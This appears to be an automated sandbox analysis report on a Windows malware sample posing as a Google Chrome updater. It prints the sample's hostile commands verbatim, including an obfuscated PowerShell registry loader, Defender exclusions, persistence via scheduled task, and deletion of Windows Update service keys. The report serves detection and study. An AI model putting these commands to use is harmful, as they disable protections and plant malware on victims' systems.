Analysis
-
max time kernel
150s -
max time network
151s -
platform
windows7_x64 -
resource
win7-20230621-en -
resource tags
arch:x64arch:x86image:win7-20230621-enlocale:en-usos:windows7-x64system -
submitted
01-07-2023 08:30
Static task
static1
Behavioral task
behavioral1
Sample
dmi1dfg7n.exe
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
dmi1dfg7n.exe
Resource
win10v2004-20230621-en
General
-
Target
dmi1dfg7n.exe
-
Size
2.8MB
-
MD5
9253ed091d81e076a3037e12af3dc871
-
SHA1
ec02829a25b3bf57ad061bbe54180d0c99c76981
-
SHA256
78e0a8309bc850037e12c2d72a5b0843dcd8b412a0a597c2a3dcbd44e9f3c859
-
SHA512
29ff2fd5f150d10b2d281a45df5b44873192605de8dc95278d6a7b5053370e4ac64a47100b13c63f3c048df351a9b51f0b93af7d922399a91508a50c152e8cf4
-
SSDEEP
49152:xkWZLeZVfE7GQFHJUXhr3o2AmO+gpMsv6gFcPJBpaAo1AIU7LXPyPZTzeRJ38AoW:xL1eY7bFpUxr3fAjAVRJBpPAUPyBnUy6
Malware Config
Signatures
-
Modifies security service 2 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Parameters reg.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\wuauserv\Security reg.exe -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 1204 created 420 1204 powershell.EXE winlogon.exe PID 568 created 420 568 powershell.EXE winlogon.exe -
Sets service image path in registry 2 TTPs 1 IoCs
Processes:
services.exedescription ioc process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinRing0_1_2_0\ImagePath = "\\??\\C:\\Program Files\\Google\\Libs\\WR64.sys" services.exe -
Stops running service(s) 3 TTPs
-
Executes dropped EXE 1 IoCs
Processes:
updater.exepid process 320 updater.exe -
Loads dropped DLL 1 IoCs
Processes:
taskeng.exepid process 948 taskeng.exe -
Drops file in System32 directory 5 IoCs
Processes:
powershell.exesvchost.exepowershell.EXEpowershell.EXEpowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\Tasks\GoogleUpdateTaskMachineQC svchost.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
dmi1dfg7n.exepowershell.EXEpowershell.EXEupdater.exedescription pid process target process PID 1364 set thread context of 836 1364 dmi1dfg7n.exe dialer.exe PID 1204 set thread context of 556 1204 powershell.EXE dllhost.exe PID 568 set thread context of 584 568 powershell.EXE dllhost.exe PID 320 set thread context of 1308 320 updater.exe dialer.exe PID 320 set thread context of 1072 320 updater.exe dialer.exe -
Drops file in Program Files directory 4 IoCs
Processes:
dmi1dfg7n.exeupdater.execmd.execmd.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe dmi1dfg7n.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe File created C:\Program Files\Google\Libs\g.log cmd.exe File created C:\Program Files\Google\Libs\g.log cmd.exe -
Drops file in Windows directory 6 IoCs
Processes:
dialer.exesvchost.exedescription ioc process File created C:\Windows\Tasks\dialersvc32.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc32.job dialer.exe File created C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\Tasks\dialersvc64.job dialer.exe File opened for modification C:\Windows\appcompat\programs\RecentFileCache.bcf svchost.exe File opened for modification C:\Windows\Tasks\dialersvc32.job svchost.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1664 sc.exe 1892 sc.exe 1256 sc.exe 1100 sc.exe 760 sc.exe 296 sc.exe 556 sc.exe 2000 sc.exe 1584 sc.exe 1652 sc.exe -
Checks processor information in registry 2 TTPs 6 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
wmiprvse.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key security queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString wmiprvse.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier wmiprvse.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Detects videocard installed 1 TTPs 1 IoCs
Uses WMIC.exe to determine videocard installed.
-
Modifies data under HKEY_USERS 3 IoCs
Processes:
powershell.EXEWMIC.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.EXE Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = d065de54f6abd901 powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ WMIC.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exepowershell.exedllhost.exepowershell.exepid process 1152 powershell.exe 672 powershell.exe 1072 powershell.exe 1204 powershell.EXE 1204 powershell.EXE 568 powershell.EXE 556 dllhost.exe 556 dllhost.exe 556 dllhost.exe 556 dllhost.exe 556 dllhost.exe 456 powershell.exe 556 dllhost.exe 568 powershell.EXE 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 1680 powershell.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe 556 dllhost.exe 584 dllhost.exe 584 dllhost.exe 556 dllhost.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
Explorer.EXEpid process 1248 Explorer.EXE -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
services.exepid process 468 services.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowershell.exepowershell.EXEpowershell.EXEdllhost.exepowershell.exedllhost.exesvchost.exepowershell.exepowercfg.exesc.exepowercfg.exepowercfg.exeupdater.exeWMIC.exedescription pid process Token: SeDebugPrivilege 1152 powershell.exe Token: SeShutdownPrivilege 1828 powercfg.exe Token: SeShutdownPrivilege 900 powercfg.exe Token: SeShutdownPrivilege 1584 powercfg.exe Token: SeDebugPrivilege 672 powershell.exe Token: SeShutdownPrivilege 1000 powercfg.exe Token: SeDebugPrivilege 1072 powershell.exe Token: SeDebugPrivilege 1204 powershell.EXE Token: SeDebugPrivilege 1204 powershell.EXE Token: SeDebugPrivilege 568 powershell.EXE Token: SeDebugPrivilege 556 dllhost.exe Token: SeDebugPrivilege 456 powershell.exe Token: SeDebugPrivilege 568 powershell.EXE Token: SeDebugPrivilege 584 dllhost.exe Token: SeAuditPrivilege 848 svchost.exe Token: SeDebugPrivilege 1680 powershell.exe Token: SeShutdownPrivilege 1032 powercfg.exe Token: SeShutdownPrivilege 1652 sc.exe Token: SeShutdownPrivilege 1032 powercfg.exe Token: SeShutdownPrivilege 1520 powercfg.exe Token: SeDebugPrivilege 320 updater.exe Token: SeAssignPrimaryTokenPrivilege 1956 WMIC.exe Token: SeIncreaseQuotaPrivilege 1956 WMIC.exe Token: SeSecurityPrivilege 1956 WMIC.exe Token: SeTakeOwnershipPrivilege 1956 WMIC.exe Token: SeLoadDriverPrivilege 1956 WMIC.exe Token: SeSystemtimePrivilege 1956 WMIC.exe Token: SeBackupPrivilege 1956 WMIC.exe Token: SeRestorePrivilege 1956 WMIC.exe Token: SeShutdownPrivilege 1956 WMIC.exe Token: SeSystemEnvironmentPrivilege 1956 WMIC.exe Token: SeUndockPrivilege 1956 WMIC.exe Token: SeManageVolumePrivilege 1956 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 1956 WMIC.exe Token: SeIncreaseQuotaPrivilege 1956 WMIC.exe Token: SeSecurityPrivilege 1956 WMIC.exe Token: SeTakeOwnershipPrivilege 1956 WMIC.exe Token: SeLoadDriverPrivilege 1956 WMIC.exe Token: SeSystemtimePrivilege 1956 WMIC.exe Token: SeBackupPrivilege 1956 WMIC.exe Token: SeRestorePrivilege 1956 WMIC.exe Token: SeShutdownPrivilege 1956 WMIC.exe Token: SeSystemEnvironmentPrivilege 1956 WMIC.exe Token: SeUndockPrivilege 1956 WMIC.exe Token: SeManageVolumePrivilege 1956 WMIC.exe Token: SeAssignPrimaryTokenPrivilege 848 svchost.exe Token: SeIncreaseQuotaPrivilege 848 svchost.exe Token: SeSecurityPrivilege 848 svchost.exe Token: SeTakeOwnershipPrivilege 848 svchost.exe Token: SeLoadDriverPrivilege 848 svchost.exe Token: SeSystemtimePrivilege 848 svchost.exe Token: SeBackupPrivilege 848 svchost.exe Token: SeRestorePrivilege 848 svchost.exe Token: SeShutdownPrivilege 848 svchost.exe Token: SeSystemEnvironmentPrivilege 848 svchost.exe Token: SeUndockPrivilege 848 svchost.exe Token: SeManageVolumePrivilege 848 svchost.exe Token: SeAssignPrimaryTokenPrivilege 848 svchost.exe Token: SeIncreaseQuotaPrivilege 848 svchost.exe Token: SeSecurityPrivilege 848 svchost.exe Token: SeTakeOwnershipPrivilege 848 svchost.exe Token: SeLoadDriverPrivilege 848 svchost.exe Token: SeSystemtimePrivilege 848 svchost.exe Token: SeBackupPrivilege 848 svchost.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
Explorer.EXEpid process 1248 Explorer.EXE 1248 Explorer.EXE -
Suspicious use of SendNotifyMessage 2 IoCs
Processes:
Explorer.EXEpid process 1248 Explorer.EXE 1248 Explorer.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
dmi1dfg7n.execmd.execmd.exepowershell.exedescription pid process target process PID 1364 wrote to memory of 1152 1364 dmi1dfg7n.exe powershell.exe PID 1364 wrote to memory of 1152 1364 dmi1dfg7n.exe powershell.exe PID 1364 wrote to memory of 1152 1364 dmi1dfg7n.exe powershell.exe PID 1364 wrote to memory of 1384 1364 dmi1dfg7n.exe cmd.exe PID 1364 wrote to memory of 1384 1364 dmi1dfg7n.exe cmd.exe PID 1364 wrote to memory of 1384 1364 dmi1dfg7n.exe cmd.exe PID 1364 wrote to memory of 584 1364 dmi1dfg7n.exe cmd.exe PID 1364 wrote to memory of 584 1364 dmi1dfg7n.exe cmd.exe PID 1364 wrote to memory of 584 1364 dmi1dfg7n.exe cmd.exe PID 1364 wrote to memory of 672 1364 dmi1dfg7n.exe powershell.exe PID 1364 wrote to memory of 672 1364 dmi1dfg7n.exe powershell.exe PID 1364 wrote to memory of 672 1364 dmi1dfg7n.exe powershell.exe PID 584 wrote to memory of 1828 584 cmd.exe powercfg.exe PID 584 wrote to memory of 1828 584 cmd.exe powercfg.exe PID 584 wrote to memory of 1828 584 cmd.exe powercfg.exe PID 1384 wrote to memory of 296 1384 cmd.exe sc.exe PID 1384 wrote to memory of 296 1384 cmd.exe sc.exe PID 1384 wrote to memory of 296 1384 cmd.exe sc.exe PID 584 wrote to memory of 900 584 cmd.exe powercfg.exe PID 584 wrote to memory of 900 584 cmd.exe powercfg.exe PID 584 wrote to memory of 900 584 cmd.exe powercfg.exe PID 1384 wrote to memory of 556 1384 cmd.exe sc.exe PID 1384 wrote to memory of 556 1384 cmd.exe sc.exe PID 1384 wrote to memory of 556 1384 cmd.exe sc.exe PID 584 wrote to memory of 1584 584 cmd.exe powercfg.exe PID 584 wrote to memory of 1584 584 cmd.exe powercfg.exe PID 584 wrote to memory of 1584 584 cmd.exe powercfg.exe PID 1384 wrote to memory of 1664 1384 cmd.exe sc.exe PID 1384 wrote to memory of 1664 1384 cmd.exe sc.exe PID 1384 wrote to memory of 1664 1384 cmd.exe sc.exe PID 584 wrote to memory of 1000 584 cmd.exe powercfg.exe PID 584 wrote to memory of 1000 584 cmd.exe powercfg.exe PID 584 wrote to memory of 1000 584 cmd.exe powercfg.exe PID 1384 wrote to memory of 1892 1384 cmd.exe sc.exe PID 1384 wrote to memory of 1892 1384 cmd.exe sc.exe PID 1384 wrote to memory of 1892 1384 cmd.exe sc.exe PID 1384 wrote to memory of 2000 1384 cmd.exe sc.exe PID 1384 wrote to memory of 2000 1384 cmd.exe sc.exe PID 1384 wrote to memory of 2000 1384 cmd.exe sc.exe PID 1384 wrote to memory of 552 1384 cmd.exe reg.exe PID 1384 wrote to memory of 552 1384 cmd.exe reg.exe PID 1384 wrote to memory of 552 1384 cmd.exe reg.exe PID 672 wrote to memory of 524 672 powershell.exe schtasks.exe PID 672 wrote to memory of 524 672 powershell.exe schtasks.exe PID 672 wrote to memory of 524 672 powershell.exe schtasks.exe PID 1384 wrote to memory of 1988 1384 cmd.exe reg.exe PID 1384 wrote to memory of 1988 1384 cmd.exe reg.exe PID 1384 wrote to memory of 1988 1384 cmd.exe reg.exe PID 1384 wrote to memory of 1168 1384 cmd.exe reg.exe PID 1384 wrote to memory of 1168 1384 cmd.exe reg.exe PID 1384 wrote to memory of 1168 1384 cmd.exe reg.exe PID 1384 wrote to memory of 1764 1384 cmd.exe reg.exe PID 1384 wrote to memory of 1764 1384 cmd.exe reg.exe PID 1384 wrote to memory of 1764 1384 cmd.exe reg.exe PID 1384 wrote to memory of 636 1384 cmd.exe reg.exe PID 1384 wrote to memory of 636 1384 cmd.exe reg.exe PID 1384 wrote to memory of 636 1384 cmd.exe reg.exe PID 1364 wrote to memory of 836 1364 dmi1dfg7n.exe dialer.exe PID 1364 wrote to memory of 836 1364 dmi1dfg7n.exe dialer.exe PID 1364 wrote to memory of 836 1364 dmi1dfg7n.exe dialer.exe PID 1364 wrote to memory of 836 1364 dmi1dfg7n.exe dialer.exe PID 1364 wrote to memory of 1072 1364 dmi1dfg7n.exe powershell.exe PID 1364 wrote to memory of 1072 1364 dmi1dfg7n.exe powershell.exe PID 1364 wrote to memory of 1072 1364 dmi1dfg7n.exe powershell.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{07f7d231-682b-448d-a41b-c0deaf9f5594}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{d9280c1e-3af1-4303-9b38-03dd0dbc0fb7}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\services.exeC:\Windows\system32\services.exe1⤵
- Sets service image path in registry
- Suspicious behavior: LoadsDriver
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
-
\\?\C:\Windows\system32\wbem\WMIADAP.EXEwmiadap.exe /F /T /R3⤵
-
C:\Windows\system32\taskeng.exetaskeng.exe {5F301E94-55C8-4AFE-921E-717E8A6E49CB} S-1-5-18:NT AUTHORITY\System:Service:3⤵
- Loads dropped DLL
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE ".(\"{1}{0}\" -f 'eT','S') (\"6T\"+\"o\") ([tYpE](\"{2}{0}{4}{1}{3}\" -F'e','mBL','refl','y','ctiOn.AsSe') ) ; $Dlr4S = [tyPe](\"{3}{1}{2}{4}{0}\"-F'Ry','oSOfT.W','iN32.R','MICR','eGiST') ; $6TO::(\"{0}{1}\" -f 'L','oad').Invoke( (.(\"{1}{2}{0}\" -f 't-Item','g','e') (\"vARI\"+\"Ab\"+\"lE\"+\":DlR4S\") ).\"VA`luE\"::\"lOc`ALM`AChine\".(\"{2}{1}{0}\" -f 'ey','ubk','OpenS').Invoke((\"{1}{0}\"-f'E','SOFTWAR')).(\"{1}{0}{2}\" -f'u','GetVal','e').Invoke((\"{1}{2}{3}{0}\"-f'ger','dia','lers','ta'))).\"EnT`Ryp`OINt\".\"in`VoKE\"(${n`Ull},${n`ULl})"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell <#ecgxrz#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { "schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe'''" } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "GoogleUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Google\Chrome\updater.exe' }5⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 05⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 06⤵
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-ac 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -standby-timeout-dc 06⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f5⤵
-
C:\Windows\system32\sc.exesc stop UsoSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits6⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc6⤵
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f6⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f6⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f6⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f6⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f6⤵
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe xtrjicqmdliu5⤵
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"6⤵
- Drops file in Program Files directory
-
C:\Windows\system32\cmd.execmd /c mkdir "C:\Program Files\Google\Libs\" & wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"5⤵
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exewmic PATH Win32_VideoController GET Name, VideoProcessor6⤵
- Detects videocard installed
- Modifies data under HKEY_USERS
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\dialer.exeC:\Windows\system32\dialer.exe wvhbfinhdckusjju 6E3sjfZq2rJQaxvLPmXgsF7vH8nKLC0ur3jCwye3fPpZDYkQjcS/S/TS19hCmaZeXwQ/O4+due3etuok0KCy6TAeBBK2Zj7dzTkc9P7Txuspl/ztFHeT1vDsXwtgxIFZnxGXI+P7h6Wy2BaqsXFRrbRIyylpVUfDVtjurLuTI6hfYZYlaT2c8T3z2D8KilAioXHHI3GdcX8L+5AQJHhaF3EikxjkII2qRl4IAJt0ne1Kthho/EoWoWqiJ8V46anYGIeeueaKL6G4gUS0jG8bW+uOPYpliibsIQvftJQy3GdQNbdmaQoQosbMtF/zsQIOPYtzoBcdM/sdKVWCIsST/Py6kltT+qpekCzJYBFF4LST+8+EmmopPFkm4CPe5KhMiY/+g/sQ7d50uqIjFwwoHwsdnFS1l7B7kznzCIpeqO/4VPcOjXZ8D/gqWFx/7uyyvuxXByWtdfg2SHIbTo9ax767hx8DEZJobkKiCLCF5s3S9KZPJ6oc8SVkEHvmPn3ocLOCMVNSrrmyVksnNDnuU8b1vWVxnieD7xm0UnpffWA=5⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k NetworkService2⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted2⤵
-
C:\Windows\system32\Dwm.exe"C:\Windows\system32\Dwm.exe"3⤵
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k RPCSS2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNoNetwork2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch2⤵
-
C:\Windows\system32\wbem\wmiprvse.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding3⤵
- Checks processor information in registry
-
C:\Windows\system32\taskhost.exe"taskhost.exe"2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation2⤵
-
C:\Windows\system32\sppsvc.exeC:\Windows\system32\sppsvc.exe2⤵
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\lsm.exeC:\Windows\system32\lsm.exe1⤵
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"C:\Users\Admin\AppData\Local\Temp\dmi1dfg7n.exe"2⤵
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.execmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\sc.exesc stop UsoSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop WaaSMedicSvc4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop wuauserv4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop bits4⤵
- Launches sc.exe
-
C:\Windows\system32\sc.exesc stop dosvc4⤵
- Launches sc.exe
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f4⤵
- Modifies security service
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f4⤵
-
C:\Windows\system32\reg.exereg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f4⤵
-
C:\Windows\system32\cmd.execmd /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 03⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-ac 04⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\powercfg.exepowercfg /x -hibernate-timeout-dc 04⤵
